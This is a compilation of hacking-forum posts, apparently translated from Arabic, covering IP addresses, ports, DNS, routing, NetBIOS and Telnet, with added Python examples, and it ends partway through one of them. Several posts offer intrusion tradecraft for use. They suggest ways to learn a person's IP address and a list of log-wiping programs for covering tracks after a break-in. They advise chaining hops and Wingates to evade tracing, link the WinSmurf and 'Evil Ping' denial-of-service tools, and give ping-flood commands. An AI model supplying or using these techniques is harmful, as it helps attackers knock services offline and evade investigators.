
Contents:

Webcrack
MungaBunga
WinSmurf
Evil Ping
DNS
Routing in the Internet
NETBIOS
Finger
Net
secure shell
Buffer Overflows
CGI
HTTP Port
NeoTrace
IIS
UniCode
God Will
NOOP4

CgiScaner
Shadow Scan Security
.htaccess
FTP (two chapters)
SQL (two chapters)
PHP Shell (three chapters)
anmap
Cross Site Scripting
Chunked
vBulletin 2.2.0
vBulletin 2.2.9
phpbb 2.0.0
php nuke


Cross Site Scripting is abbreviated XSS (older texts write CSS). To find holes and exploits for a product, search for its name together with the words bug and exploit, for example:

XSS+BUG+EXPLOIT
IIS+exploit+bug

Search engines: http://www.google.com/ , http://www.yahoo.com/ , http://www.altavista.com/ , http://www.lycos.com/ , http://hotbot.lycos.com/
File sharing: kazaa, WinMX
News: http://news.bbc.co.uk/hi/arabic/news , http://arabic.cnn.com/ , http://www.aljazeera.net/
Security sites: http://www.securiteam.com/ , http://www.securityfocus.com/ , http://www.ussrback.com/ , http://www.ntbugtraq.com/ , http://www.ntsecurity.nu/ , http://www.ntsecurity.com/
Hardware and drivers: http://nvidia.com/ , http://www.asus.com/ , http://drivers.online.net.nz/ , http://intel.com/ , http://www.amdmb.com/
Post:

IP addresses

Every machine connected to the Internet has an IP address. On Windows 9x you can see your own with Start > Run > winipcfg.

An IP address is four numbers separated by dots, for example 212.33.40.1 or 24.5.66.3 (or 10.10.10.1); each number is 8 bits, so it runs from 0 to 255. The first number (212 in the first example) tells you which block the address was allocated from.

Address blocks are handed out by IANA (Internet Assigned Numbers Authority) through three regional registries:
-1 ARIN (American Registry for Internet Numbers)
-2 RIPE (Réseaux IP Européens)
-3 APNIC (Asia Pacific Network Information Center)

A whois query on an IP address at the registry tells you who owns the block it belongs to; for RIPE use http://www.ripe.net/db/whois.html. Addresses that share their leading numbers are in the same block: 212.26.75.34 and 212.26.75.201 belong to the same network, so searching for 212.26.75 at http://www.ripe.net/db/whois.html returns the owner of that range.
Port

A server listens on ports, one per service: a web server on port 80, an ftp server on port 21, NetMeeting on 1720.

DNS

DNS maps names to IP addresses: CNN's www.cnn.com resolves to 207.145.53.10. When you type a name, your DNS server (which your machine reaches by its IP address) looks the name up and returns the IP address.

netstat

netstat lists your machine's connections. Every connection has a client and a server side, and each side is an IP address plus a port, so netstat shows the IP address of whoever you are connected to. Run it from the MS-DOS prompt (Start > Programs > MS-DOS Prompt).
IRC (Internet Relay Chat)

IRC uses a chat server and chat clients. The server sees every user's IP address, and some servers show it to the other users, partially masked, as XXX.111.222.333.

Two ways to get someone's IP address:
.1 Get them to connect to you directly (a file transfer in the chat program, for instance), then read their address from netstat while the connection is up.
.2 Whois: for a web site, look the domain up at http://www.networksolutions.com/cgi-bin/whois/whois (type the name without www, for example wagait.com) to get the owner's details and name servers.

Common ports:

Port          Service
21            FTP
25            SMTP
80            Web (HTTP)
110           POP3
139           NetBIOS
1720, 1503    NetMeeting
6667          Chat (IRC)
12345, 20034  NetBus (trojan)
31337         BackOrifice (trojan)
Things that threaten a home computer:

-1 Viruses.
-2 Trojans: a server part is planted on your machine and the attacker drives it from a client. The known ones are NetBus, Back Orifice and SubSeven. The server part can come by download, by e-mail or even on a CD-ROM.
-3 .
-4 Stored passwords: Windows 95/98 keeps dial-up and share passwords in encrypted PWL files, and those files can be cracked.
-5 ICQ: the ICQ client gives away your IP address to other users !
-6 Scripts !
-7 Servers you run yourself (FTP, SMTP): every open service is a door.

" "
Post by JawaDal (z3r0):

here we G0 ..
A shell account gives you a DOS-like command line on the remote machine .. when it reboots you lose it . !!!
FTP: ftp://hostname: .. GFI LANguard network security scanner .. port 21 ..
Once logged in to FTP the commands are: cd, lcd, dir, ls.
LOGS (LOG.FILES): when you log in, the log files record that you were logged in: whether you are online, your IP Address, your host name, your screen resolution, your ISP. There are 3 log files:
- WTMP: every login, with host and tty
- UTMP: who is online
- LASTLOG: the last login
The log files are how they track you down ... so:
go in through a chain: <-- <---- FTP -- ! then <-- <-- <-- ... -- so on -- so that they have to trace every hop back !!
Wingate: a Wingate hides your IP !!
To stay anonymous on the web: watch out for spyware, use a firewall (zone alarm) and Window Washer .. search for "how to stay anonymous on the web" and "how to secure my computer".
Pretty Good Privacy (PGP): http://www.pgpi.org/ ok !
-1 wingate !
To clear your tracks, the log modifiers: ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c wtmped.c zap.c
Stay anonymous ..

" "

Post:

Windows NT security

What NT provides:
-4 Evaluated by the National Security Agency (NSA).
-5 Protection of the boot path (ROM Boot Chip) and of RAM.
-7 Permissions on objects.
-8 Rights granted to accounts.
An ACL on every object (see below).

Security Accounts Manager (SAM): the database of accounts. A Workstation has its own SAM; in a Domain the SAM on the domain controller is used.

Access Token: built when a user logs on (also for a Remote Logon) and attached to every process the user starts. It holds:
-1 the user's Security Identifier (SID)
-2 the Group SIDs of the groups the user belongs to
-3 the user's Privileges

Permission levels on an object range from full control down to No Access.

Access Control List (ACL): every object carries an ACL made of Access Control Entries (ACE). Each ACE names a SID and what that SID may do with the object. Two kinds of ACE:
-1 AccessAllowed
-2 AccessDenied, the "No Access" permission.
At access time the SIDs in the token are compared with the SID in each ACE of the ACL, in order. On NT and 2000 the AccessDenied ACEs are placed ahead of the AccessAllowed ACEs, so if any SID in the token matches a deny it is found before the allows and the user is refused; access succeeds only if the allow ACEs that match the token's SIDs together grant everything that was asked for.
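The access check described above, as an added example: a toy model of NT's token-versus-ACL evaluation written for this page, not code from the original text or from Windows. The SID strings, the three-bit access mask and the ACL are constructed for the demonstration; the deny-before-allow ordering and the walk-in-order rule are the real ones.

```python
from dataclasses import dataclass

# Access-mask bits for the toy object (constructed; real NT masks are 32-bit).
READ, WRITE, EXECUTE = 0x1, 0x2, 0x4
FULL = READ | WRITE | EXECUTE


@dataclass(frozen=True)
class Token:
    """Built at logon: the user's SID, the SIDs of its groups, its privileges."""
    user_sid: str
    group_sids: tuple
    privileges: tuple = ()   # e.g. SeBackupPrivilege bypasses ACLs; not modelled here

    def sids(self):
        return (self.user_sid,) + tuple(self.group_sids)


@dataclass(frozen=True)
class ACE:
    kind: str   # "AccessDenied" or "AccessAllowed"
    sid: str
    mask: int


def canonical(acl):
    """NT/2000 canonical order: every AccessDenied ACE ahead of every AccessAllowed ACE."""
    denies = [a for a in acl if a.kind == "AccessDenied"]
    allows = [a for a in acl if a.kind == "AccessAllowed"]
    return denies + allows


def access_check(token, acl, desired, canonicalize=True):
    """Walk the ACL in order and decide whether `desired` rights are granted.

    A deny ACE for any SID in the token that covers a desired right refuses at
    once; allow ACEs accumulate rights until every desired bit is granted.
    ACEs for SIDs not in the token are skipped; an empty ACL grants nothing.
    canonicalize=False walks the list exactly as written, to show why the
    ordering matters.
    """
    granted = 0
    for ace in (canonical(acl) if canonicalize else acl):
        if ace.sid not in token.sids():
            continue
        if ace.kind == "AccessDenied":
            if ace.mask & desired:
                return False
        elif ace.kind == "AccessAllowed":
            granted |= ace.mask & desired
            if granted == desired:
                return True
    return granted == desired


# Constructed SIDs and ACL for the example.
USERS = "S-1-5-32-545"           # built-in Users
TEMPS = "S-1-5-21-1-1-1-1105"    # a made-up "Temps" group
ALICE = "S-1-5-21-1-1-1-1001"
BOB = "S-1-5-21-1-1-1-1002"

# Written with the allow first on purpose; canonical() fixes the order.
SHARE_ACL = [
    ACE("AccessAllowed", USERS, FULL),
    ACE("AccessDenied", TEMPS, WRITE),    # "No Access" for writing by Temps
]


def demo():
    alice = Token(ALICE, (USERS, TEMPS))
    bob = Token(BOB, (USERS,))
    return {
        "alice_read": access_check(alice, SHARE_ACL, READ),                 # True
        "alice_write": access_check(alice, SHARE_ACL, WRITE),               # False: deny seen first
        "alice_rw": access_check(alice, SHARE_ACL, READ | WRITE),           # False: one denied bit refuses all
        "bob_write": access_check(bob, SHARE_ACL, WRITE),                   # True: Bob is not in Temps
        "unordered_alice_write": access_check(alice, SHARE_ACL, WRITE, canonicalize=False),  # True
    }
```

The last entry of demo() is the point of the canonical order: walked as written, the Users allow grants the write before the Temps deny is ever reached. Privileges such as backup and restore bypass the ACL entirely and are left out of the model.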

" "

Post by BeReal: hacking terms

===========================================================
Telnet: connects you to a port on a remote server, for example port 21 (FTP), where you may get in using Anonymous Mode. Start ==> Run ==> telnet.
------------------------------------------------------------------------
Scanner: scans a server for holes (Exploits). Shadow Security Scanner, Stealth, Omran Fast Scanner; they report IIS and CGI holes.
-----------------------------------------------------------------------
Exploits: a program, or just a URL, that uses a hole in the server: Buffer Over Flow Exploits, CGI Exploits (CGI Bugs), Unicode Exploits, PHP Exploits, DOS Exploits. A Fire Wall may stop them. Most are written in C (.c) and have to be compiled, for example with the Borland C++ Compiler.
----------------------------------------------------------------------
FireWall: filters what is allowed in and out of the server.
----------------------------------------------------------------------
Token (Shadowed Passwd): when the password field in the passwd file is * or x, the password is Shadowed and kept in the Shadow file, /etc/shadow.
----------------------------------------------------------------------
Anonymous: connecting without identifying yourself.
----------------------------------------------------------------------
Vulnerabilities: the holes in a server; a server that has them is Vulnerable (: . Security Focus lists them.
----------------------------------------------------------------------
passwd file: the file with the server's accounts.
---------------------------------------------------------------------
root: the top account on the server.
---------------------------------------------------------------------
Server: a machine that serves others, on the network 24 hours a day (: .
----------------------------------------------------------------------
Buffer over Flow: giving a program more input than it can hold, to crash it (DOS) or to take it over.


" " Webcrack

Post:
....
...
Download: http://www.dunbell.freeserve.co.uk/webcrack40.zip

" MungaBunga "

Post by KING HAKER:
MUNGA BUNGA

You need: -1 -2 -3 -4 -5 ( ) -6

Steps:
1
2 BROWSE
3 BROWSE (.....)
4
5 ( )
6
7
8
9
10
11 (as in 6)
12
13 ( )
14

Reference: http://koti.mbnet.fi/hypnosis/caliberx/cracking.htm
" " WinSmurf


Post:
..
winsmurf (Scree Shot)
--------------------------------------------------------------
*** winsmurf ***
-------------------------------------------------------------
It takes a txt file (about 10 Kb) of addresses to bounce the pings off .. winsmurf ...
Download: http://www.planet-eagle.de/files/WSmurf.zip

" Evil Ping "

Post:
.. sends about 200 pings ..

" "

Post:
, , :
, :
Download: http://www.geocities.com/boom_q8y4/dorrah.zip

" "

Post:
... ping ::
Ping www.xx.com
:Xxx
The switches -n (count) and -l (size) set how many pings and how big:
ping -n 1000 -l 400 www.xxx.com
sends 1000 pings of 400 bytes each ...
ping -t ip
pings the ip continuously until you stop it.
" "
Post:

Telnet on Windows 2000

Windows 2000 Server's Telnet service accepts up to 63 simultaneous connections.

Telnet Authentication
You can use your local Windows 2000 user name and password or domain account information to access the Telnet server. The security scheme is integrated into Windows 2000 security. If you do not use the NT LAN Manager (NTLM) authentication option, the user name and password are sent to the Telnet server as plain text. If you are using NTLM authentication, the client uses the Windows 2000 security context for authentication and the user is not prompted for a user name and password. The user name and password are encrypted.
NTLM protects only the logon: the session data after authentication still travels in clear text, so anything typed or displayed in a Telnet session can be sniffed.

If the User Must Change Password At Next Logon option is set for a user, the user cannot log on to the Telnet service when NTLM authentication is used. The user must log on to the server directly and change the password, and then log on through the Telnet client.

Starting the service
In a Windows 2000 Server default installation, the Telnet service is set to manual startup. You can use the Services snap-in or the Computer Management snap-in to start, stop, or configure the Telnet service for automatic startup. In the Computer Management snap-in, Telnet is a service located under the Services and Applications node. Select Services from the console tree, and then select Telnet from the list of services in the details pane.

You can also start or stop the Telnet service from a command prompt. To start Telnet Server, type net start tlntsvr or net start telnet at the command prompt, and then press Enter. To stop Telnet Server, type net stop tlntsvr or net stop telnet at the command prompt, and then press Enter.

Telnet Server Admin
You can use the Telnet Server Admin utility to start, stop, or get information about Telnet Server. You can also use it to get a list of current users, terminate a user's session, or change Telnet Server registry settings. To open it: Start, Run, tlntadmn, OK. It is also listed under Administrative Tools as Telnet Server Administration once the Adminpak.msi tools are installed. Its menu offers:
Quit this application
List the current users
Terminate a user session
Display/change registry settings
Start the service
Stop the service
Errors it may report: Invalid input; Failed to open the registry key; Failed to query the registry value.

Telnet client
You can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server software. Once you have made this connection, you can communicate with the Telnet server. The type of session you conduct depends on how the Telnet software is configured. Communication, games, system administration, and local logon simulations are some typical uses of Telnet.
The Telnet client uses the Telnet protocol, part of the TCP/IP suite of protocols, to connect to a remote computer over a network. The Telnet client software allows a computer to connect to a remote server. You can use the Telnet client provided with Windows 2000 to connect to a remote computer, log on to the remote computer, and interact with it as if you were sitting in front of it.
Users of previous versions of Microsoft's Telnet client may notice a few changes in the version included with Windows 2000. The most obvious change is that Microsoft Telnet Client is now a command-line application rather than a Windows application. As a command-line application, Microsoft Telnet Client will seem very familiar to users of UNIX-based Telnet clients.
An important new feature found in Microsoft Telnet Client is NTLM authentication support. Using this feature, a computer using Microsoft Telnet Client can log on to a Windows 2000 computer running the Telnet service by using NTLM authentication.
To open the client: Start, Run, telnet. TCP/IP must be installed.
To display help for Telnet, type help at the Microsoft Telnet command prompt. To connect to a site, type open <computer_name> where <computer_name> is the IP address or host name of the computer running the Telnet service.

Worked example with two machines, Hishem1 and Hishem2
On Hishem2 (the server), logged on as Administrator: Start, Programs, Administrative Tools, Services. In the Services list open Telnet; in The Telnet Properties (Local Computer) change Startup Type from Manual to Automatic, under Service status click Start, then OK and close Services.
On Hishem1 (the client): Start, Run, telnet, OK. Type help (or ?) to list the commands, then open Hishem2 (or o Hishem2) and log on with a Hishem2 account.
To watch the session from Hishem2: Start, Run, tlntadmn, OK opens Telnet Server Admin; choose 1 to list the current users, and each session shows the user and where it came from (Hishem1 here).

Reading mail over Telnet
Start, Run: telnet pop.mail.yahoo.com 110
then type:
user xxxx
pass xxxx
the server answers +OK after each; list shows the messages in the mailbox and dele deletes one. The password crosses the wire in clear text, exactly as the pop client would send it.
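The POP3 session above typed by hand into telnet, as an added example written for this page (not code from the original text): a small client that sends USER, PASS, LIST, DELE and QUIT over a raw socket and checks every +OK / -ERR reply, run offline against a constructed POP3 server on the other end of a socketpair. The account name, password and mailbox sizes are made up.

```python
import socket
import threading

CRLF = b"\r\n"


class LineSocket:
    """recv()-buffered CRLF line reader/writer; both sides of POP3 speak in lines."""

    def __init__(self, sock):
        self.sock, self.buf = sock, b""

    def readline(self):
        while CRLF not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                return None            # peer closed
            self.buf += chunk
        line, self.buf = self.buf.split(CRLF, 1)
        return line.decode("ascii", "replace")

    def writeline(self, text):
        self.sock.sendall(text.encode("ascii") + CRLF)


class Pop3Client:
    """The commands typed by hand after `telnet host 110`, with reply checking."""

    def __init__(self, sock):
        self.io = LineSocket(sock)
        greeting = self.io.readline()
        if not greeting or not greeting.startswith("+OK"):
            raise RuntimeError(f"bad greeting: {greeting!r}")

    def _cmd(self, line):
        self.io.writeline(line)
        reply = self.io.readline()
        if reply is None or not reply.startswith("+OK"):
            raise RuntimeError(f"{line.split()[0]} failed: {reply!r}")
        return reply

    def _multiline(self):
        lines = []
        while (line := self.io.readline()) != ".":
            if line is None:
                raise RuntimeError("connection closed mid-response")
            lines.append(line[1:] if line.startswith("..") else line)   # undo byte-stuffing
        return lines

    def login(self, user, password):
        self._cmd(f"USER {user}")
        self._cmd(f"PASS {password}")     # clear text on the wire, exactly as over telnet

    def list(self):
        self._cmd("LIST")
        return {int(n): int(size) for n, size in (l.split() for l in self._multiline())}

    def dele(self, n):
        self._cmd(f"DELE {n}")

    def quit(self):
        self._cmd("QUIT")
        self.io.sock.close()


def fake_pop3_server(sock, user="xxxx", password="hunter2", sizes=(120, 4096)):
    """Constructed server for the offline demo: one account, one mailbox."""
    io = LineSocket(sock)
    mailbox = dict(enumerate(sizes, 1))
    authed, name_ok = False, False
    io.writeline("+OK POP3 server ready")
    while (line := io.readline()) is not None:
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            name_ok = arg == user
            io.writeline("+OK")                  # real servers also say +OK to unknown users
        elif cmd == "PASS":
            authed = name_ok and arg == password
            io.writeline("+OK logged in" if authed else "-ERR authentication failed")
        elif cmd == "QUIT":
            io.writeline("+OK bye")
            break
        elif not authed:
            io.writeline("-ERR not logged in")
        elif cmd == "LIST":
            io.writeline(f"+OK {len(mailbox)} messages")
            for n, size in mailbox.items():
                io.writeline(f"{n} {size}")
            io.writeline(".")
        elif cmd == "DELE" and arg.isdigit() and int(arg) in mailbox:
            del mailbox[int(arg)]
            io.writeline("+OK deleted")
        else:
            io.writeline("-ERR unknown command")
    sock.close()


def demo(password="hunter2"):
    """Run the exchange over a socketpair; returns the listing before and after DELE 1."""
    a, b = socket.socketpair()
    server = threading.Thread(target=fake_pop3_server, args=(b,), daemon=True)
    server.start()
    try:
        client = Pop3Client(a)
        client.login("xxxx", password)
        before = client.list()
        client.dele(1)
        after = client.list()
        client.quit()
    finally:
        a.close()
        server.join(timeout=5)
    return before, after
```

Against a real server, replace the socketpair with socket.create_connection((host, 110)); everything the client does is what you would type by hand.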




Telnet client command reference

open [\\RemoteServer] [Port]
  \\RemoteServer: the computer to connect to. Port: the port to use; when omitted the Telnet port (23) is used. Abbreviation: o.
  Example, connecting to the server Redmond on port 44:
  o redmond 44

close [\\RemoteServer]
  Closes the connection to the server. Abbreviation: c. Example, for Redmond:
  c redmond 44

send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch] [?]
  Sends a Telnet control command to the server:
  ao     abort output
  ayt    "Are you there?"
  esc    the escape character
  ip     interrupt process
  synch  Telnet synch
  ?      help

display
  Shows the current client settings (escape character and the other options). From inside a session, CTRL+] returns to the Telnet prompt and ENTER returns to the session.

tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]
  Administers the Telnet service on the local or the named server: start, stop, pause, continue. On Windows 2000 tlntadmn is the menu-driven Telnet Server Admin described above; the switches below are the Windows XP command-line form.

tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger]
  Maximum number of simultaneous connections; default 10.

tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger]
  Maximum number of failed logon attempts before the connection is dropped (the text gives 100).

tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss]
  Idle time after which a session is disconnected. tlntadmn /? lists the rest.

" " DNS


Post by Dark Devil:
.....

DNS:
==================================================
What is DNS?
==============
DNS: Domain Name System. DNS works on port 53 and translates alphabetical hostnames such as http://www.burn.com/ into IP ADDRESSES such as 127.0.0.1; this is called address resolution. Before DNS, address resolution was done with a HOST FILE kept by the Stanford Research Institute's Network Information Center (SRI-NIC); every site had to fetch the UPDATEd file from SRI-NIC by FTP. DNS replaced it: DNS is decentralized, every DNS server holds its own part of the data and asks other DNS servers for the rest.

THE DNS SERVER
================
On UNIX the DNS SERVER is BIND (Berkeley Internet Name Domain). A DNS server is made of: the name server itself (the daemon program that listens to port 53), the RESOLVER, and the NAME SERVER data. When you ask for http://www.burn.com/ the resolver passes the name to the daemon program, which returns the IP address of http://www.burn.com/.

THE TREE INFORMATION
======================
DNS SERVERS are arranged as a tree. Say your ISP is isp.co.uk and its DNS server's hostname is dns.isp.co.uk. When you ask dns.isp.co.uk for http://www.burn.com/ and it does not have the IP, it asks the DNS SERVER above it, the one for UK, which also serves some-organization.org.uk, school.edu.uk, university.ac.uk, england.gov.uk, airforce.mil.uk; that one can ask the DNS ROOT, which knows which server holds each DOMAIN NAME and its IP.

When and why does DNS "hang" or fail?
======================================
DNS fails when your ISP's DNS server is down or not answering. The browser waits about 15 seconds, then reports that the address could not be found, or HOST IP TIMED OUT; try REFRESH / RELOAD.
.. SSL ..
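The lookup the post describes, as an added example written for this page (not Dark Devil's code): build the DNS query a resolver sends to port 53 for www.burn.com, and parse the reply, including the name-compression pointers real servers use. The reply is constructed here so the example runs offline; resolve() shows the same exchange over UDP against a real server and is not exercised by the tests. The transaction-id check matters: a reply whose id does not match is a stale or forged answer and must be dropped.

```python
import socket
import struct

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """www.burn.com -> b'\\x03www\\x04burn\\x03com\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        if not 0 < len(label) < 64:
            raise ValueError(f"bad label {label!r}")
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, txid):
    """12-byte header (RD set, one question) followed by the question for an A record."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def read_name(msg, off):
    """Decode a possibly compressed name; returns (name, offset just after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                     # pointer to an earlier name
            pointer = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            if end is None:
                end = off + 2
            hops += 1
            if hops > 16 or pointer >= off:           # refuse loops and forward pointers
                raise ValueError("bad compression pointer")
            off = pointer
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_response(msg, txid):
    """Return (rcode, [(name, ttl, ipv4), ...]) for the A records in the answer section."""
    rtxid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    if rtxid != txid:
        raise ValueError("transaction id mismatch: stale or spoofed reply")
    if not flags & 0x8000:
        raise ValueError("not a response")
    off = 12
    for _ in range(qd):                               # skip the echoed question(s)
        _, off = read_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            answers.append((name, ttl, ".".join(str(b) for b in rdata)))
    return flags & 0xF, answers


def build_response(query, ipv4, ttl=300):
    """Constructed reply for the offline demo: echoes the question, answers with one A record."""
    txid = struct.unpack(">H", query[:2])[0]
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA, rcode 0
    answer = b"\xc0\x0c"                                         # pointer to the name at offset 12
    answer += struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
    answer += bytes(int(o) for o in ipv4.split("."))
    return header + query[12:] + answer


def resolve_offline(name, ipv4="127.0.0.1", txid=0xBEEF):
    """Full round trip without a network: query -> constructed server -> parsed answer."""
    return parse_response(build_response(build_query(name, txid), ipv4), txid)


def resolve(name, server, txid=0x1234, timeout=3):
    """The same exchange against a real name server on UDP 53 (not used by the tests)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (server, 53))
        data, _ = s.recvfrom(4096)
    return parse_response(data, txid)
```

A fixed txid as in resolve() is fine for a demonstration; a resolver that matters must pick it (and the source port) at random, since a guessable id is what lets a forged reply be accepted.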

" " Routing in the Internet


Post by Dark Devil:

Routing in the Internet
=========================
what is routing!?
How a packet finds its way from one network to the next. It involves:
1- Physical Address Determination
2- Selection of inter-network gateways
3- Symbolic and Numeric Addresses

Every packet carries an ip address, but on the local network it must also be addressed to a machine (inclusion of a local network address or physical address within the frame). local networks are joined by gateways, today called routers, which do the ip routing. address translation is what turns a name such as http://www.burn.com/ into an ip address (that is DNS, see the DNS post). The first of the three is the Physical Address:

Physical Address Determination
===============================
To hand ip data to a machine on the local network the sender needs the physical address that goes with the ip address. ip addresses are mapped to physical addresses by ARP (Address Resolution Protocol), and the answers are kept in a cache that arp -a prints:

C:\WINDOWS>arp -a
Interface: 62.135.9.102 on Interface 0x2
  Internet Address      Physical Address      Type
  207.46.226.17         20-53-52-43-00-00     dynamic
  213.131.64.2          20-53-52-43-00-00     dynamic
  213.131.65.238        20-53-52-43-00-00     dynamic

The Physical Address is the Mac Address. All three remote ip addresses show the same Physical Address because they are outside the local network, so the frames go to the router and it is the router's address that appears. type dynamic means the entry was learned by ARP and will expire; static means it was entered by hand ("permanent").

routers
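The ARP table shown above, as an added example written for this page (not from the post): parse `arp -a` output, report physical addresses that several IP addresses share, and compare two snapshots for entries whose MAC changed. The first snapshot is the one in the text with the columns in Windows order; the second is constructed, with one address now answering from a different MAC.

```python
import re

# One `arp -a` row: IP, MAC (dashes on Windows, colons on Unix), type.
ROW = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+"
    r"(dynamic|static)\b", re.I)


def parse_arp(text):
    """{ip: (mac, type)} from `arp -a` output; MACs normalised to lower-case with dashes."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            table[m.group(1)] = (m.group(2).lower().replace(":", "-"), m.group(3).lower())
    return table


def shared_macs(table):
    """MACs that several IPs map to.

    Off-subnet destinations all show the router's MAC, as in the text; several
    on-subnet hosts sharing one MAC is what an ARP-spoofing box looks like.
    """
    by_mac = {}
    for ip, (mac, _) in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_entries(before, after):
    """IPs whose MAC differs between two snapshots: a dynamic entry (above all the
    gateway's) flipping to another MAC is the classic sign of ARP poisoning."""
    return {ip: (before[ip][0], after[ip][0])
            for ip in before if ip in after and before[ip][0] != after[ip][0]}


# The table from the text, columns in Windows order.
SNAPSHOT_1 = """\
Interface: 62.135.9.102 on Interface 0x2
  Internet Address      Physical Address      Type
  207.46.226.17         20-53-52-43-00-00     dynamic
  213.131.64.2          20-53-52-43-00-00     dynamic
  213.131.65.238        20-53-52-43-00-00     dynamic
"""

# Constructed later snapshot: one destination now resolves to a different MAC.
SNAPSHOT_2 = """\
Interface: 62.135.9.102 on Interface 0x2
  Internet Address      Physical Address      Type
  207.46.226.17         20-53-52-43-00-00     dynamic
  213.131.64.2          00-0c-29-aa-bb-cc     dynamic
  213.131.65.238        20-53-52-43-00-00     dynamic
"""
```

Run it against real output with parse_arp(subprocess.check_output(["arp", "-a"], text=True)) on each side of the interval you care about.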

" " NETBIOS


Post:

SNMP and NetBIOS are the two services that give away the most about an NT host.

NetBIOS: the NetBIOS API is reached over TCP port 139. On NT, NetBIOS over TCP/IP can be switched off in the TCP/IP properties (Advanced, WINS tab).

RestrictAnonymous: anonymous (null session) connections can list users, shares and policies. On Windows 2000 set Administrative TOOLS > Local Security policy > Local policies > security options > "Additional restrictions for anonymous connections" to "No Access Without Explicit Anonymous Permissions" (RestrictAnonymous = 2 in the registry).

What the other side uses to enumerate NetBIOS:
Net View: lists machines and their shares on NT/W2000, given a name or IP.
The other Net commands.
Nbtscan: scans a range for NetBIOS name tables ...
Legion: scans for open shares ...

Filter at the border: TCP and UDP 135, 139 and, on 2000, 445 as well.

SNMP: the default community string on NT/2000 is Public. In the SNMP service properties remove the public community and turn on Send authentication trap. The LAN Manager MIB-2 agent also publishes users, shares and services over SNMP; remove it in regedit under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
by deleting the value that points at LANManagerMIB2Agent.

Finally, disable NetBIOS over TCP/IP wherever it is not needed.
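What Nbtscan sends to read a host's name table, as an added example written for this page (not nbtscan's own code): a NetBIOS node status query (RFC 1002 NBSTAT, UDP port 137) for the wildcard name, and a parser for the reply's name table and adapter address. The reply is constructed so the example runs offline; the host name HISHEM2, the workgroup and the MAC are made up.

```python
import struct

NBSTAT, CLASS_IN = 0x0021, 0x0001
# Meaning of the 16th byte of a NetBIOS name, as nbtscan reports it.
SUFFIX = {0x00: "workstation/domain", 0x03: "messenger", 0x1b: "domain master browser",
          0x1c: "domain controllers", 0x1d: "master browser", 0x1e: "browser election",
          0x20: "file server"}


def encode_nb_name(name, suffix=0x00):
    """34-byte encoded name: length 0x20, 32 'half-ASCII' characters, 0x00 terminator."""
    if name == "*":
        raw = b"*" + b"\x00" * 15                    # wildcard used by node status queries
    else:
        raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    half = bytes(x for b in raw for x in ((b >> 4) + 0x41, (b & 0x0F) + 0x41))
    return b"\x20" + half + b"\x00"


def build_node_status_query(txid):
    """What a scanner sends to UDP 137: an NBSTAT question for the wildcard name."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_nb_name("*") + struct.pack(">HH", NBSTAT, CLASS_IN)


def parse_node_status_reply(msg, txid):
    """(names, mac): names as (name, suffix byte, 'group'|'unique') taken from the RDATA."""
    rtxid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    if rtxid != txid or not flags & 0x8000 or an < 1:
        raise ValueError("not a node status response to our query")
    off = 12
    off += 2 if msg[off] & 0xC0 == 0xC0 else 34       # compressed pointer or full name
    rtype, _rclass, _ttl, _rdlen = struct.unpack(">HHIH", msg[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("unexpected record type")
    count = msg[off]
    off += 1
    names = []
    for _ in range(count):
        raw, nflags = msg[off:off + 16], struct.unpack(">H", msg[off + 16:off + 18])[0]
        off += 18
        names.append((raw[:15].decode("ascii", "replace").rstrip(), raw[15],
                      "group" if nflags & 0x8000 else "unique"))
    mac = "-".join(f"{b:02x}" for b in msg[off:off + 6])   # unit ID = adapter MAC
    return names, mac


def build_node_status_reply(query, names, mac):
    """Constructed reply for the offline demo, in the shape Windows returns."""
    txid = struct.unpack(">H", query[:2])[0]
    rdata = bytes([len(names)])
    for name, suffix, kind in names:
        rdata += name.upper().ljust(15).encode("ascii") + bytes([suffix])
        rdata += struct.pack(">H", (0x8000 if kind == "group" else 0) | 0x0400)  # 0x0400 = active
    rdata += bytes.fromhex(mac.replace("-", "")) + b"\x00" * 40                  # statistics block
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    return (header + encode_nb_name("*")
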